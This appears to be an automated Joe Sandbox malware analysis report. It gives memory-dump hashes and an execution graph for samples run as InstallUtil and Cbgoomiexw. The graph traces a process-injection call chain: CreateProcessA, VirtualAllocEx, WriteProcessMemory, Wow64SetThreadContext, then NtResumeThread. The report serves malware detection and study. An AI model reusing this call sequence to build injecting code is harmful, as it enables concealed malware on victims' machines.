                                          • Instruction ID: 32188ede68be764466507813c213412d9d04e9b8f2291d34485131b554d2f333
                                          • Opcode Fuzzy Hash: c93daa3fb82112f3161d30b625640ba8300d7556248fa3a8d009183d9e3c69de
                                          • Instruction Fuzzy Hash: 7311C175F412159FCF22BBB994586AE7FB2EB88254F200939E945D3341EB34C843CB92
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41d6381424bea01d417834270f46b615723e273748835244dd5d48a4b7f38270
                                          • Instruction ID: bb5f27085b02aefb7c4930ff683cb66133b7de417a2c0d2937ee12ef23fdf9c0
                                          • Opcode Fuzzy Hash: 41d6381424bea01d417834270f46b615723e273748835244dd5d48a4b7f38270
                                          • Instruction Fuzzy Hash: AD119131B153564FEB17676C94602A93FA1EF4221CF14496BE056CF252E624C8898BC5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 768d1439f126d0b4a385f8d4657735ed5855007d221812793ace69e1812bf55b
                                          • Instruction ID: df09a710b28de0a154af4be171c92b3672cd024c4e60324d14c4a9470223a66d
                                          • Opcode Fuzzy Hash: 768d1439f126d0b4a385f8d4657735ed5855007d221812793ace69e1812bf55b
                                          • Instruction Fuzzy Hash: D9115E31A003198FCF25FFBC85501EEBBB5AF58228B2404BAD809F7641D735D946CB91
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c836ee9fd685f03a0eed0e5c16f9233fa4c6028e5e99ba43e05bcab5552f446c
                                          • Instruction ID: 18537fb56a7b085a9d92e68b898c108d3ef916c19892867d0a13c9d5cfbf16d2
                                          • Opcode Fuzzy Hash: c836ee9fd685f03a0eed0e5c16f9233fa4c6028e5e99ba43e05bcab5552f446c
                                          • Instruction Fuzzy Hash: 51012D31A003198FCF25FFBD85405AEBBF5AB48259B2404BAD809F7641E735D9468BA1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73928c2a0a9309c131242a7bd1cdea272de61be2dcd8634ad57fec99724ffdff
                                          • Instruction ID: 0d94feae9b426d27a7afe353dbba8ac1ebaf0de75bea356635ae8ff4876790d0
                                          • Opcode Fuzzy Hash: 73928c2a0a9309c131242a7bd1cdea272de61be2dcd8634ad57fec99724ffdff
                                          • Instruction Fuzzy Hash: E901F77050025B9FCB06EBECE95099C3BB5FF41309B044A99C0444B1EACE342E46C742
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 827f4dc4ba4fb03fed21242111a4ab98116b2d921ccafe2ab8dbca636bd401ff
                                          • Instruction ID: c8a571602fe9dd0d89ab551714031f5c0c7d9fe97b196becf1615467872822a7
                                          • Opcode Fuzzy Hash: 827f4dc4ba4fb03fed21242111a4ab98116b2d921ccafe2ab8dbca636bd401ff
                                          • Instruction Fuzzy Hash: 88F0447490021EAFCB45FBECF950A9D77F5FB40309F504969C00997269DE302E458B91

                                          Execution Graph

                                          Execution Coverage:12.1%
                                          Dynamic/Decrypted Code Coverage:98%
                                          Signature Coverage:0%
                                          Total number of Nodes:508
                                          Total number of Limit Nodes:51
                                          execution_graph 62384 6302430 62385 630247e NtProtectVirtualMemory 62384->62385 62387 63024c8 62385->62387 62418 260ca40 62419 260ca86 62418->62419 62423 260d028 62419->62423 62426 260d008 62419->62426 62420 260cb73 62430 260b530 62423->62430 62427 260d00d 62426->62427 62428 260d056 62427->62428 62429 260b530 DuplicateHandle 62427->62429 62428->62420 62429->62428 62431 260d090 DuplicateHandle 62430->62431 62432 260d056 62431->62432 62432->62420 62436 2604950 62438 260495e 62436->62438 62439 26044c4 62436->62439 62440 26044cf 62439->62440 62443 26045d8 62440->62443 62442 2604a85 62442->62438 62444 26045e3 62443->62444 62447 2604608 62444->62447 62446 2604b62 62446->62442 62448 2604613 62447->62448 62451 2604638 62448->62451 62450 2604c74 62450->62446 62452 2604643 62451->62452 62458 26076fc 62452->62458 62454 2607c99 62454->62450 62455 2607a70 62455->62454 62463 260c778 62455->62463 62468 260c768 62455->62468 62459 2607707 62458->62459 62460 260925a 62459->62460 62473 26092a8 62459->62473 62477 26092b8 62459->62477 62460->62455 62464 260c799 62463->62464 62465 260c7bd 62464->62465 62481 260c928 62464->62481 62485 260c918 62464->62485 62465->62454 62469 260c799 62468->62469 62470 260c7bd 62469->62470 62471 260c928 2 API calls 62469->62471 62472 260c918 2 API calls 62469->62472 62470->62454 62471->62470 62472->62470 62474 26092fb 62473->62474 62475 2609306 KiUserCallbackDispatcher 62474->62475 62476 2609330 62474->62476 62475->62476 62476->62460 62478 26092fb 62477->62478 62479 2609306 KiUserCallbackDispatcher 62478->62479 62480 2609330 62478->62480 62479->62480 62480->62460 62483 260c935 62481->62483 62482 260c96f 62482->62465 62483->62482 62489 260b490 62483->62489 62486 260c935 62485->62486 62487 260c96f 62486->62487 62488 260b490 2 API calls 62486->62488 62487->62465 62488->62487 62490 260b495 62489->62490 62492 260d688 62490->62492 62493 260cc94 62490->62493 62494 260cc9f 62493->62494 62495 2604638 2 API calls 62494->62495 62496 260d6f7 62495->62496 62496->62492 62497 6336d61 62498 6336d6b 62497->62498 62502 6199d58 62498->62502 62511 6199d4a 62498->62511 62499 6336cc2 62503 6199d6d 62502->62503 62520 6199d98 62503->62520 62525 619a313 62503->62525 62530 619a2df 62503->62530 62535 619a2af 62503->62535 62540 6199e2a 62503->62540 62545 6199d88 62503->62545 62504 6199d83 62504->62499 62512 6199d6d 62511->62512 62514 6199d98 2 API calls 62512->62514 62515 6199d88 2 API calls 62512->62515 62516 6199e2a 2 API calls 62512->62516 62517 619a2af 2 API calls 62512->62517 62518 619a2df 2 API calls 62512->62518 62519 619a313 2 API calls 62512->62519 62513 6199d83 62513->62499 62514->62513 62515->62513 62516->62513 62517->62513 62518->62513 62519->62513 62522 6199dc2 62520->62522 62521 619a1df 62521->62504 62522->62521 62523 6303760 VirtualProtect 62522->62523 62524 6303758 VirtualProtect 62522->62524 62523->62522 62524->62522 62526 6199e14 62525->62526 62527 619a1df 62526->62527 62528 6303760 VirtualProtect 62526->62528 62529 6303758 VirtualProtect 62526->62529 62527->62504 62528->62526 62529->62526 62531 619a1df 62530->62531 62532 6199e14 62530->62532 62531->62504 62532->62531 62533 6303760 VirtualProtect 62532->62533 62534 6303758 VirtualProtect 62532->62534 62533->62532 62534->62532 62537 6199e14 62535->62537 62536 619a1df 62536->62504 62537->62536 62538 6303760 VirtualProtect 62537->62538 62539 6303758 VirtualProtect 62537->62539 62538->62537 62539->62537 62542 6199e14 62540->62542 62541 619a1df 62541->62504 62542->62540 62542->62541 62543 6303760 VirtualProtect 62542->62543 62544 6303758 VirtualProtect 62542->62544 62543->62542 62544->62542 62546 6199d98 62545->62546 62547 619a1df 62546->62547 62548 6303760 VirtualProtect 62546->62548 62549 6303758 VirtualProtect 62546->62549 62547->62504 62548->62546 62549->62546 62590 6336f55 62591 6336f5f 62590->62591 62595 630c950 62591->62595 62606 630c940 62591->62606 62592 6336cc2 62596 630c965 62595->62596 62603 630c97b 62596->62603 62617 630d050 62596->62617 62621 630d07e 62596->62621 62625 630d23b 62596->62625 62629 630d3e8 62596->62629 62634 630d208 62596->62634 62638 630cd88 62596->62638 62642 630cd98 62596->62642 62646 630cd47 62596->62646 62603->62592 62607 630c94d 62606->62607 62608 630d050 10 API calls 62607->62608 62609 630cd47 10 API calls 62607->62609 62610 630cd98 10 API calls 62607->62610 62611 630cd88 10 API calls 62607->62611 62612 630d208 10 API calls 62607->62612 62613 630d3e8 10 API calls 62607->62613 62614 630c97b 62607->62614 62615 630d23b 10 API calls 62607->62615 62616 630d07e 10 API calls 62607->62616 62608->62614 62609->62614 62610->62614 62611->62614 62612->62614 62613->62614 62614->62592 62615->62614 62616->62614 62619 630cdf5 62617->62619 62618 630ce3e 62618->62603 62619->62618 62650 630e1d9 62619->62650 62622 630cdf5 62621->62622 62623 630ce3e 62622->62623 62624 630e1d9 10 API calls 62622->62624 62623->62603 62624->62622 62626 630cdf5 62625->62626 62627 630ce3e 62626->62627 62628 630e1d9 10 API calls 62626->62628 62627->62603 62628->62626 62630 630d3fe 62629->62630 62632 630cdf5 62629->62632 62630->62603 62631 630ce3e 62631->62603 62632->62631 62633 630e1d9 10 API calls 62632->62633 62633->62632 62636 630cdf5 62634->62636 62635 630ce3e 62635->62603 62636->62635 62637 630e1d9 10 API calls 62636->62637 62637->62636 62640 630cd98 62638->62640 62639 630ce3e 62639->62603 62640->62639 62641 630e1d9 10 API calls 62640->62641 62641->62640 62644 630cdc2 62642->62644 62643 630ce3e 62643->62603 62644->62643 62645 630e1d9 10 API calls 62644->62645 62645->62644 62648 630cd4b 62646->62648 62647 630ce3e 62647->62603 62648->62647 62649 630e1d9 10 API calls 62648->62649 62649->62648 62651 630e1fd 62650->62651 62655 630e613 62651->62655 62660 630e2da 62651->62660 62652 630e21f 62652->62619 62656 630e619 62655->62656 62665 630e9c0 62656->62665 62705 630e9b3 62656->62705 62657 630e2a3 62657->62652 62661 630e614 62660->62661 62662 630e2a3 62660->62662 62661->62662 62663 630e9c0 10 API calls 62661->62663 62664 630e9b3 10 API calls 62661->62664 62662->62652 62663->62662 62664->62662 62666 630e9d5 62665->62666 62745 630eeb2 62666->62745 62750 630f70e 62666->62750 62755 630f18b 62666->62755 62760 630ea0b 62666->62760 62765 630f9c6 62666->62765 62770 630f7c6 62666->62770 62775 630f006 62666->62775 62779 630f8c5 62666->62779 62787 630fa03 62666->62787 62792 630ecc3 62666->62792 62797 630fac3 62666->62797 62805 630f981 62666->62805 62810 630ec81 62666->62810 62815 630ef80 62666->62815 62820 630f81c 62666->62820 62825 630ee1c 62666->62825 62830 630ec18 62666->62830 62835 630f1d8 62666->62835 62840 630f354 62666->62840 62845 630f553 62666->62845 62850 630efd2 62666->62850 62855 630ea10 62666->62855 62860 630ec90 62666->62860 62865 630fbae 62666->62865 62870 630f3ee 62666->62870 62875 630f5ed 62666->62875 62880 630f5ac 62666->62880 62884 630efec 62666->62884 62889 630f7a9 62666->62889 62894 630ef26 62666->62894 62899 630f265 62666->62899 62903 630f861 62666->62903 62908 630f661 62666->62908 62913 630edb9 62666->62913 62918 630efb8 62666->62918 62923 630ebf4 62666->62923 62928 630f773 62666->62928 62667 630e9f7 62667->62657 62706 630e9c0 62705->62706 62708 630eeb2 2 API calls 62706->62708 62709 630f773 2 API calls 62706->62709 62710 630ebf4 2 API calls 62706->62710 62711 630efb8 2 API calls 62706->62711 62712 630edb9 2 API calls 62706->62712 62713 630f661 2 API calls 62706->62713 62714 630f861 2 API calls 62706->62714 62715 630f265 2 API calls 62706->62715 62716 630ef26 2 API calls 62706->62716 62717 630f7a9 2 API calls 62706->62717 62718 630efec 2 API calls 62706->62718 62719 630f5ac 2 API calls 62706->62719 62720 630f5ed 2 API calls 62706->62720 62721 630f3ee 2 API calls 62706->62721 62722 630fbae 2 API calls 62706->62722 62723 630ec90 2 API calls 62706->62723 62724 630ea10 2 API calls 62706->62724 62725 630efd2 2 API calls 62706->62725 62726 630f553 2 API calls 62706->62726 62727 630f354 2 API calls 62706->62727 62728 630f1d8 2 API calls 62706->62728 62729 630ec18 2 API calls 62706->62729 62730 630ee1c 2 API calls 62706->62730 62731 630f81c 2 API calls 62706->62731 62732 630ef80 2 API calls 62706->62732 62733 630ec81 2 API calls 62706->62733 62734 630f981 2 API calls 62706->62734 62735 630fac3 4 API calls 62706->62735 62736 630ecc3 2 API calls 62706->62736 62737 630fa03 2 API calls 62706->62737 62738 630f8c5 4 API calls 62706->62738 62739 630f006 2 API calls 62706->62739 62740 630f7c6 2 API calls 62706->62740 62741 630f9c6 2 API calls 62706->62741 62742 630ea0b 2 API calls 62706->62742 62743 630f18b 2 API calls 62706->62743 62744 630f70e 2 API calls 62706->62744 62707 630e9f7 62707->62657 62708->62707 62709->62707 62710->62707 62711->62707 62712->62707 62713->62707 62714->62707 62715->62707 62716->62707 62717->62707 62718->62707 62719->62707 62720->62707 62721->62707 62722->62707 62723->62707 62724->62707 62725->62707 62726->62707 62727->62707 62728->62707 62729->62707 62730->62707 62731->62707 62732->62707 62733->62707 62734->62707 62735->62707 62736->62707 62737->62707 62738->62707 62739->62707 62740->62707 62741->62707 62742->62707 62743->62707 62744->62707 62746 630ea8e 62745->62746 62747 630eb0b 62746->62747 62933 6303520 62746->62933 62937 6303518 62746->62937 62747->62667 62752 630ea8e 62750->62752 62751 630eb0b 62751->62667 62752->62751 62753 6303520 NtResumeThread 62752->62753 62754 6303518 NtResumeThread 62752->62754 62753->62752 62754->62752 62757 630ea8e 62755->62757 62756 630eb0b 62756->62667 62757->62756 62758 6303520 NtResumeThread 62757->62758 62759 6303518 NtResumeThread 62757->62759 62758->62757 62759->62757 62762 630ea10 62760->62762 62761 630eb0b 62761->62667 62762->62761 62763 6303520 NtResumeThread 62762->62763 62764 6303518 NtResumeThread 62762->62764 62763->62762 62764->62762 62767 630ea8e 62765->62767 62766 630eb0b 62766->62667 62767->62766 62768 6303520 NtResumeThread 62767->62768 62769 6303518 NtResumeThread 62767->62769 62768->62767 62769->62767 62772 630ea8e 62770->62772 62771 630eb0b 62771->62667 62772->62771 62773 6303520 NtResumeThread 62772->62773 62774 6303518 NtResumeThread 62772->62774 62773->62772 62774->62772 62776 630f01e 62775->62776 62941 637fed0 62776->62941 62777 630f036 62780 630f8dc 62779->62780 62964 6303370 62780->62964 62968 6303368 62780->62968 62781 630eb0b 62781->62667 62782 630ea8e 62782->62781 62785 6303520 NtResumeThread 62782->62785 62786 6303518 NtResumeThread 62782->62786 62785->62782 62786->62782 62789 630ea8e 62787->62789 62788 630eb0b 62788->62667 62789->62788 62790 6303520 NtResumeThread 62789->62790 62791 6303518 NtResumeThread 62789->62791 62790->62789 62791->62789 62794 630ea8e 62792->62794 62793 630eb0b 62793->62667 62794->62793 62795 6303520 NtResumeThread 62794->62795 62796 6303518 NtResumeThread 62794->62796 62795->62794 62796->62794 62798 630fadd 62797->62798 62803 6303370 WriteProcessMemory 62798->62803 62804 6303368 WriteProcessMemory 62798->62804 62799 630eb0b 62799->62667 62800 630ea8e 62800->62799 62801 6303520 NtResumeThread 62800->62801 62802 6303518 NtResumeThread 62800->62802 62801->62800 62802->62800 62803->62800 62804->62800 62807 630ea8e 62805->62807 62806 630eb0b 62806->62667 62807->62806 62808 6303520 NtResumeThread 62807->62808 62809 6303518 NtResumeThread 62807->62809 62808->62807 62809->62807 62812 630ea8e 62810->62812 62811 630eb0b 62811->62667 62812->62811 62813 6303520 NtResumeThread 62812->62813 62814 6303518 NtResumeThread 62812->62814 62813->62812 62814->62812 62817 630ea8e 62815->62817 62816 630eb0b 62816->62667 62817->62816 62818 6303520 NtResumeThread 62817->62818 62819 6303518 NtResumeThread 62817->62819 62818->62817 62819->62817 62822 630ea8e 62820->62822 62821 630eb0b 62821->62667 62822->62821 62823 6303520 NtResumeThread 62822->62823 62824 6303518 NtResumeThread 62822->62824 62823->62822 62824->62822 62826 630ea8e 62825->62826 62826->62825 62827 630eb0b 62826->62827 62828 6303520 NtResumeThread 62826->62828 62829 6303518 NtResumeThread 62826->62829 62827->62667 62828->62826 62829->62826 62832 630ea8e 62830->62832 62831 630eb0b 62831->62667 62832->62831 62833 6303520 NtResumeThread 62832->62833 62834 6303518 NtResumeThread 62832->62834 62833->62832 62834->62832 62836 630f1e2 62835->62836 62972 6341718 62836->62972 62977 6341708 62836->62977 62837 630f242 62842 630ea8e 62840->62842 62841 630eb0b 62841->62667 62842->62841 62843 6303520 NtResumeThread 62842->62843 62844 6303518 NtResumeThread 62842->62844 62843->62842 62844->62842 62847 630ea8e 62845->62847 62846 630eb0b 62846->62667 62847->62846 62848 6303520 NtResumeThread 62847->62848 62849 6303518 NtResumeThread 62847->62849 62848->62847 62849->62847 62851 630efdc 62850->62851 62853 6341718 2 API calls 62851->62853 62854 6341708 2 API calls 62851->62854 62852 630f242 62853->62852 62854->62852 62857 630ea43 62855->62857 62856 630eb0b 62856->62667 62857->62856 62858 6303520 NtResumeThread 62857->62858 62859 6303518 NtResumeThread 62857->62859 62858->62857 62859->62857 62862 630ea8e 62860->62862 62861 630eb0b 62861->62667 62862->62861 62863 6303520 NtResumeThread 62862->62863 62864 6303518 NtResumeThread 62862->62864 62863->62862 62864->62862 62867 630ea8e 62865->62867 62866 630eb0b 62866->62667 62867->62866 62868 6303520 NtResumeThread 62867->62868 62869 6303518 NtResumeThread 62867->62869 62868->62867 62869->62867 62871 630f40e 62870->62871 62873 6303370 WriteProcessMemory 62871->62873 62874 6303368 WriteProcessMemory 62871->62874 62872 630f459 62873->62872 62874->62872 62877 630ea8e 62875->62877 62876 630eb0b 62876->62667 62877->62876 62878 6303520 NtResumeThread 62877->62878 62879 6303518 NtResumeThread 62877->62879 62878->62877 62879->62877 62990 6341850 62880->62990 62995 6341840 62880->62995 62881 630f5c4 62885 630eff6 62884->62885 62887 6341718 2 API calls 62885->62887 62888 6341708 2 API calls 62885->62888 62886 630f242 62887->62886 62888->62886 62891 630ea8e 62889->62891 62890 630eb0b 62890->62667 62891->62890 62892 6303520 NtResumeThread 62891->62892 62893 6303518 NtResumeThread 62891->62893 62892->62891 62893->62891 62896 630ea8e 62894->62896 62895 630eb0b 62895->62667 62896->62895 62897 6303520 NtResumeThread 62896->62897 62898 6303518 NtResumeThread 62896->62898 62897->62896 62898->62896 63009 6341680 62899->63009 63014 634166f 62899->63014 62900 630f27d 62905 630ea8e 62903->62905 62904 630eb0b 62904->62667 62905->62904 62906 6303520 NtResumeThread 62905->62906 62907 6303518 NtResumeThread 62905->62907 62906->62905 62907->62905 62910 630ea8e 62908->62910 62909 630eb0b 62909->62667 62910->62909 62911 6303520 NtResumeThread 62910->62911 62912 6303518 NtResumeThread 62910->62912 62911->62910 62912->62910 62915 630ea8e 62913->62915 62914 630eb0b 62914->62667 62915->62914 62916 6303520 NtResumeThread 62915->62916 62917 6303518 NtResumeThread 62915->62917 62916->62915 62917->62915 62920 630ea8e 62918->62920 62919 630eb0b 62919->62667 62920->62919 62921 6303520 NtResumeThread 62920->62921 62922 6303518 NtResumeThread 62920->62922 62921->62920 62922->62920 62925 630ea8e 62923->62925 62924 630eb0b 62924->62667 62925->62924 62926 6303520 NtResumeThread 62925->62926 62927 6303518 NtResumeThread 62925->62927 62926->62925 62927->62925 62930 630ea8e 62928->62930 62929 630eb0b 62929->62667 62930->62929 62931 6303520 NtResumeThread 62930->62931 62932 6303518 NtResumeThread 62930->62932 62931->62930 62932->62930 62934 6303568 NtResumeThread 62933->62934 62936 630359d 62934->62936 62936->62746 62938 6303520 NtResumeThread 62937->62938 62940 630359d 62938->62940 62940->62746 62942 637fee7 62941->62942 62943 637ff09 62942->62943 62946 6340523 62942->62946 62951 634057f 62942->62951 62943->62777 62947 634052c 62946->62947 62956 6302b50 62947->62956 62960 6302b46 62947->62960 62952 63405a7 62951->62952 62954 6302b50 CreateProcessA 62952->62954 62955 6302b46 CreateProcessA 62952->62955 62953 63400d3 62954->62953 62955->62953 62957 6302bb4 CreateProcessA 62956->62957 62959 6302d3c 62957->62959 62961 6302b50 CreateProcessA 62960->62961 62963 6302d3c 62961->62963 62965 63033b8 WriteProcessMemory 62964->62965 62967 630340f 62965->62967 62967->62782 62969 6303370 WriteProcessMemory 62968->62969 62971 630340f 62969->62971 62971->62782 62973 634172d 62972->62973 62982 6303269 62973->62982 62986 6303270 62973->62986 62974 634174f 62974->62837 62978 6341718 62977->62978 62980 6303270 VirtualAllocEx 62978->62980 62981 6303269 VirtualAllocEx 62978->62981 62979 634174f 62979->62837 62980->62979 62981->62979 62983 6303270 VirtualAllocEx 62982->62983 62985 63032ed 62983->62985 62985->62974 62987 63032b0 VirtualAllocEx 62986->62987 62989 63032ed 62987->62989 62989->62974 62991 6341865 62990->62991 63001 6302e50 62991->63001 63005 6302e4a 62991->63005 62992 634187e 62992->62881 62996 6341828 62995->62996 62997 634184a 62995->62997 62996->62881 62999 6302e50 Wow64SetThreadContext 62997->62999 63000 6302e4a Wow64SetThreadContext 62997->63000 62998 634187e 62998->62881 62999->62998 63000->62998 63002 6302e95 Wow64SetThreadContext 63001->63002 63004 6302edd 63002->63004 63004->62992 63006 6302e50 Wow64SetThreadContext 63005->63006 63008 6302edd 63006->63008 63008->62992 63010 6341695 63009->63010 63012 6302e50 Wow64SetThreadContext 63010->63012 63013 6302e4a Wow64SetThreadContext 63010->63013 63011 63416ae 63011->62900 63012->63011 63013->63011 63015 6341680 63014->63015 63017 6302e50 Wow64SetThreadContext 63015->63017 63018 6302e4a Wow64SetThreadContext 63015->63018 63016 63416ae 63016->62900 63017->63016 63018->63016 62433 637a11f 62435 637d1d0 VirtualProtect 62433->62435 62434 63701e5 62435->62434 62550 260a6b8 62553 260a7b0 62550->62553 62551 260a6c7 62554 260a7e4 62553->62554 62555 260a7c1 62553->62555 62554->62551 62555->62554 62556 260a9e8 GetModuleHandleW 62555->62556 62557 260aa15 62556->62557 62557->62551 62558 637836e 62559 637838d 62558->62559 62561 637d1d0 VirtualProtect 62559->62561 62560 63701e5 62561->62560 62562 242d118 62563 242d130 62562->62563 62564 242d18b 62563->62564 62566 637dc88 62563->62566 62567 637dcb0 62566->62567 62570 637e148 62567->62570 62568 637dcd7 62571 637e175 62570->62571 62572 637e30b 62571->62572 62573 637d1d0 VirtualProtect 62571->62573 62572->62568 62574 637e2fc 62573->62574 62574->62568 62388 63372be 62389 63372c8 62388->62389 62393 6305278 62389->62393 62397 6305269 62389->62397 62390 6337306 62394 630528d 62393->62394 62401 6305349 62394->62401 62398 630528d 62397->62398 62400 6305349 2 API calls 62398->62400 62399 63052a3 62399->62390 62400->62399 62403 6305368 62401->62403 62402 63052a3 62402->62390 62403->62402 62404 6303760 VirtualProtect 62403->62404 62405 6303758 VirtualProtect 62403->62405 62404->62403 62405->62403 62575 637556a 62578 637e540 62575->62578 62579 637e555 62578->62579 62582 637e590 62579->62582 62583 637e5b7 62582->62583 62586 637e698 62583->62586 62587 637e6d8 VirtualAlloc 62586->62587 62589 63701e5 62587->62589 62406 6372138 62407 6372157 62406->62407 62410 637d1d0 62407->62410 62412 637d1f7 62410->62412 62414 637d620 62412->62414 62415 637d668 VirtualProtect 62414->62415 62417 637217e 62415->62417
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                          • API String ID: 0-312445597
                                          • Opcode ID: c78ed7a2865001d895882ef8d28f4a7f5cb8838ab7834c81c03ffa2b10e32c27
                                          • Instruction ID: 99c1d4d5ae419e60c76578762eeaa85a20a937ba73b17e73f0b8614a63a08593
                                          • Opcode Fuzzy Hash: c78ed7a2865001d895882ef8d28f4a7f5cb8838ab7834c81c03ffa2b10e32c27
                                          • Instruction Fuzzy Hash: EAB22C74A00228CFDB54DFA4C884BADB7B6BF48700F158599E509AB3A5DB70ED85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                          • API String ID: 0-2546334966
                                          • Opcode ID: 479bc4ad0dd233708f80c105901c0e89935db041cbeb826ff8fa297e56a6b131
                                          • Instruction ID: a4a5d7142e7197f2c8aafc92d7fe322cb51c61d9d457234358c077fd54a43ab7
                                          • Opcode Fuzzy Hash: 479bc4ad0dd233708f80c105901c0e89935db041cbeb826ff8fa297e56a6b131
                                          • Instruction Fuzzy Hash: F3220B34A00229CFDB64DF64C984BADB7B2BF48305F159199E509AB3A5DB30ED85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 82f6d0f653827c47716b43141f6fbb3b3d0c739101d6294188bcee98c1dfe12d
                                          • Instruction ID: 57795808e9efa2bd959f7e6a5021b44ae90b6430f15b310e0965cc9fa8b32c28
                                          • Opcode Fuzzy Hash: 82f6d0f653827c47716b43141f6fbb3b3d0c739101d6294188bcee98c1dfe12d
                                          • Instruction Fuzzy Hash: D7F1F874E05228CFEBA4CF69D844BA9B7F6BF49300F1091AAE50DAB654D7705985CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 26325b64ef6caeea649d180d19bd4a178dde99dff0d44feba3be72de74b6b8b4
                                          • Instruction ID: 93cebeb5068efd14d848fa566f9a6ea822c33bb77eb04cd943448c6e175aff72
                                          • Opcode Fuzzy Hash: 26325b64ef6caeea649d180d19bd4a178dde99dff0d44feba3be72de74b6b8b4
                                          • Instruction Fuzzy Hash: F3F1F674E05228CFEBA4CF69D844B99BBF2FF49300F1091AAE509AB654DB705A85CF50
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063024B9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: e068b9750d96462348de7e85f99442cd215f99ba3d305a3f31bec47c1b750ef8
                                          • Instruction ID: 16443c8d40d2897d0390154ff0d3fd23f92cdba28cecb425a09a2e9d185cbeea
                                          • Opcode Fuzzy Hash: e068b9750d96462348de7e85f99442cd215f99ba3d305a3f31bec47c1b750ef8
                                          • Instruction Fuzzy Hash: 502102B59013499FCB10DFAAD884ADEFBF5FF48310F20842AE559A3240C775AA45CBA5
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063024B9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 822a60eb443b48bf4bdfc4e87d094d5abb0838dadca5c3895e2a4a5b11fae7ee
                                          • Instruction ID: af53345dd564eae63f51684ee7c4e976b15f8eafae76f3f51f79ae276a37cd81
                                          • Opcode Fuzzy Hash: 822a60eb443b48bf4bdfc4e87d094d5abb0838dadca5c3895e2a4a5b11fae7ee
                                          • Instruction Fuzzy Hash: 462116B1D003099FCB10DFAAD884ADEFBF5FF48310F20842AE519A3240C7759904CBA1
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0630358E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907640161.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6300000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 1f9c224afb9733b51bdcb3c4cf74e22315aa8327ee4b8c5ffe3980f5f3a82bf1
                                          • Instruction ID: ada149cdb82274d0dc556e252984cdf740252e2c8fc49ccc445690bae36461e3
